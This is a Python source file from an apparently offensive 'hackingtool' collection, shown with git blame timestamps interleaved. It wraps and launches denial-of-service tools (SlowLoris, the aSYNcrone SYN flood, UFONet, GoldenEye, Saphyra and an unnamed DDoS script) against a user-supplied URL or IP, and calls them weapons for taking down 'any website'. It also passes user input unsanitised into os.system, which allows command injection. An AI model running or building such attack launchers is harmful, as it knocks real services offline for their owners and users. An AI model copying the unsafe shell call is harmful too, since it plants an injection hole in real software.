hackingtool/tools/ddos.py

138 lines
4.3 KiB
Python
Raw Normal View History

# coding=utf-8
import os
import subprocess
from core import HackingTool
from core import HackingToolsCollection
2023-07-18 03:33:23 +00:00
2021-11-04 18:27:18 +00:00
class ddos(HackingTool):
2023-07-18 03:33:23 +00:00
TITLE = "ddos"
DESCRIPTION = (
"Best DDoS Attack Script With 36 Plus Methods."
"DDoS attacks\n\b "
"for SECURITY TESTING PURPOSES ONLY! "
)
2021-11-04 18:27:18 +00:00
INSTALL_COMMANDS = [
"git clone https://github.com/the-deepnet/ddos.git",
2023-07-18 03:33:23 +00:00
"cd ddos;sudo pip3 install -r requirements.txt",
2021-11-04 18:27:18 +00:00
]
PROJECT_URL = "https://github.com/the-deepnet/ddos.git"
def run(self):
method = input("Enter Method >> ")
url = input("Enter URL >> ")
threads = input("Enter Threads >> ")
proxylist = input(" Enter ProxyList >> ")
multiple = input(" Enter Multiple >> ")
timer = input(" Enter Timer >> ")
os.system("cd ddos;")
2023-07-18 03:33:23 +00:00
subprocess.run(
[
"sudo",
"python3 ddos",
method,
url,
"socks_type5.4.1",
threads,
proxylist,
multiple,
timer,
]
)
2021-11-04 18:27:18 +00:00
class SlowLoris(HackingTool):
TITLE = "SlowLoris"
2023-07-18 03:33:23 +00:00
DESCRIPTION = (
"Slowloris is basically an HTTP Denial of Service attack."
"It send lots of HTTP Request"
)
2020-12-15 23:19:29 +00:00
INSTALL_COMMANDS = ["sudo pip3 install slowloris"]
def run(self):
target_site = input("Enter Target Site:- ")
subprocess.run(["slowloris", target_site])
class Asyncrone(HackingTool):
TITLE = "Asyncrone | Multifunction SYN Flood DDoS Weapon"
2023-07-18 03:33:23 +00:00
DESCRIPTION = (
"aSYNcrone is a C language based, mulltifunction SYN Flood "
"DDoS Weapon.\nDisable the destination system by sending a "
"SYN packet intensively to the destination."
)
INSTALL_COMMANDS = [
"git clone https://github.com/fatih4842/aSYNcrone.git",
2023-07-18 03:33:23 +00:00
"cd aSYNcrone;sudo gcc aSYNcrone.c -o aSYNcrone -lpthread",
]
PROJECT_URL = "https://github.com/fatihsnsy/aSYNcrone"
def run(self):
source_port = input("Enter Source Port >> ")
target_ip = input("Enter Target IP >> ")
target_port = input("Enter Target port >> ")
os.system("cd aSYNcrone;")
2023-07-18 03:33:23 +00:00
subprocess.run(
["sudo", "./aSYNcrone", source_port, target_ip, target_port, 1000]
)
class UFONet(HackingTool):
TITLE = "UFOnet"
2023-07-18 03:33:23 +00:00
DESCRIPTION = (
"UFONet - is a free software, P2P and cryptographic "
"-disruptive \n toolkit- that allows to perform DoS and "
"DDoS attacks\n\b "
"More Usage Visit"
)
INSTALL_COMMANDS = [
"sudo git clone https://github.com/epsylon/ufonet.git",
2023-07-18 03:33:23 +00:00
"cd ufonet;sudo python3 setup.py install;sudo pip3 install GeoIP;sudo pip3 install python-geoip;sudo pip3 install pygeoip;sudo pip3 install requests;sudo pip3 install pycrypto;sudo pip3 install pycurl;sudo pip3 install whois;sudo pip3 install scapy-python3",
]
RUN_COMMANDS = ["sudo python3 ufonet --gui"]
PROJECT_URL = "https://github.com/epsylon/ufonet"
class GoldenEye(HackingTool):
TITLE = "GoldenEye"
2023-07-18 03:33:23 +00:00
DESCRIPTION = (
"GoldenEye is a python3 app for SECURITY TESTING PURPOSES ONLY!\n"
"GoldenEye is a HTTP DoS Test Tool."
)
INSTALL_COMMANDS = [
"sudo git clone https://github.com/jseidl/GoldenEye.git;"
"chmod -R 755 GoldenEye"
]
PROJECT_URL = "https://github.com/jseidl/GoldenEye"
def run(self):
os.system("cd GoldenEye ;sudo ./goldeneye.py")
2023-07-18 03:37:05 +00:00
print("\033[96m Go to Directory \n [*] USAGE: ./goldeneye.py <url> [OPTIONS]")
2023-07-17 20:31:48 +00:00
2023-07-17 20:33:57 +00:00
class Saphyra(HackingTool):
2023-07-18 03:33:23 +00:00
TITLE = "SaphyraDDoS"
DESCRIPTION = "A complex python code to DDoS any website with a very easy usage.!\n"
INSTALL_COMMANDS = [
"sudo su",
"git clone https://github.com/anonymous24x7/Saphyra-DDoS.git",
"cd Saphyra-DDoS",
"chmod +x saphyra.py",
"python saphyra.py",
]
PROJECT_URL = "https://github.com/anonymous24x7/Saphyra-DDoS"
2023-01-02 04:28:04 +00:00
def run(self):
url = input("Enter url>>> ")
try:
os.system("python saphyra.py " + url)
2023-07-18 03:37:05 +00:00
except Exception:
2023-01-02 04:28:04 +00:00
print("Enter a valid url.")
2023-07-18 03:33:23 +00:00
class DDOSTools(HackingToolsCollection):
TITLE = "DDOS Attack Tools"
2023-07-18 03:40:09 +00:00
TOOLS = [SlowLoris(), Asyncrone(), UFONet(), GoldenEye(), Saphyra()]